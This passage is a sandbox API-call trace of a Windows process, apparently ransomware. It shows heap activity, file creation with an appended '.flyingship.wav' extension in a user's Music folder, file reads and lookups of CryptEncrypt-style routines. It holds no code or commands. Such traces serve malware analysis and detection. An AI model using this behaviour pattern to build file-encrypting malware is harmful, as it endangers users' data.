lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0182.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0182.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0182.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0182.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0182.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0182.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0182.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0182.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0182.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8feba8 [0182.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0182.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0182.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0182.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0182.484] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\-eybmjwmxhp")) returned 0x10 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0182.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0182.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0182.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0182.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\-eybmjwmxhp\\tebq0vdnsx.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0182.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0182.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0182.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0182.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0182.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0182.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0182.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0182.486] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0182.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0182.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0182.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0182.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0182.486] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0182.486] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0182.487] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0182.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0182.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0182.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0182.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0182.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0182.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0182.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0182.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0182.488] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0182.488] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0182.491] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x22b9, lpOverlapped=0x0) returned 1 [0182.492] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0182.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0182.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0182.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x122b9) returned 0xbea018 [0182.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0182.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0182.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0182.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0182.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0182.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x122b9) returned 0xbfc2e0 [0182.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0182.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.495] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0182.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0182.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0182.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x122b9) returned 0xbea018 [0182.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0182.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0182.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.495] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0182.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0182.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0182.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0182.496] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0182.496] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0182.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0182.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x122b9) returned 0xbea018 [0182.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0182.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0182.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0182.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0182.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0182.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0182.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0182.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0182.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0182.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0182.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0182.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0182.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0182.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0182.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x122b9) returned 0xa5f008 [0182.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0182.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0182.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0182.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0182.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0182.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0182.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0182.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0182.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0182.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0182.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0182.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0182.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0182.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0182.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0182.500] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0182.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0182.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0182.500] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0182.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0182.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0182.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0182.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0182.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0182.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0182.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0182.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0182.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0182.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0182.501] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0182.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0182.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0182.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0182.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28d8 [0182.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0182.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0182.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0182.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0182.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0182.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0182.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0182.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0182.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0182.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0182.502] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0182.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0182.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0182.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0182.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0182.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0182.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0182.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0182.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0182.503] RtlAllocateHeap (HeapHandle=0x8a0000, 